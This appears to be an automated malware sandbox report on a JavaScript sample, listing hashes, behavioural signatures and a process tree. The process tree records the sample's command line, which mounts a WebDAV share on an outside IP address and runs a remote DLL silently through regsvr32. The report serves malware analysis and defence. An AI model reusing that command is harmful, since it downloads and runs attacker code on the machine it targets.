Analysis
-
max time kernel
139s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
23-07-2024 02:39
Static task
static1
Behavioral task
behavioral1
Sample
80b41e6d04b6b0afbd52e9905eec07050a34058a95ea41999f688e5b0a1e2eb3.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
80b41e6d04b6b0afbd52e9905eec07050a34058a95ea41999f688e5b0a1e2eb3.js
Resource
win10v2004-20240709-en
General
-
Target
80b41e6d04b6b0afbd52e9905eec07050a34058a95ea41999f688e5b0a1e2eb3.js
-
Size
3KB
-
MD5
701b54cb7401445b0fbdc73b6c66c745
-
SHA1
655001f3d9346b2595d55bf69839e344080000e9
-
SHA256
80b41e6d04b6b0afbd52e9905eec07050a34058a95ea41999f688e5b0a1e2eb3
-
SHA512
059171bc8d0a9f720ea5939bb8253d39e79e4699dd84b45e66bbaf682439f6ab29bac84c1be1b79be8a9815ba91713a531772532ac3ef3dae15af53f54013c6c
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1620 wrote to memory of 432 1620 wscript.exe 84 PID 1620 wrote to memory of 432 1620 wscript.exe 84 PID 432 wrote to memory of 4444 432 cmd.exe 86 PID 432 wrote to memory of 4444 432 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\80b41e6d04b6b0afbd52e9905eec07050a34058a95ea41999f688e5b0a1e2eb3.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\19851924030403.dll2⤵
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:4444
-
-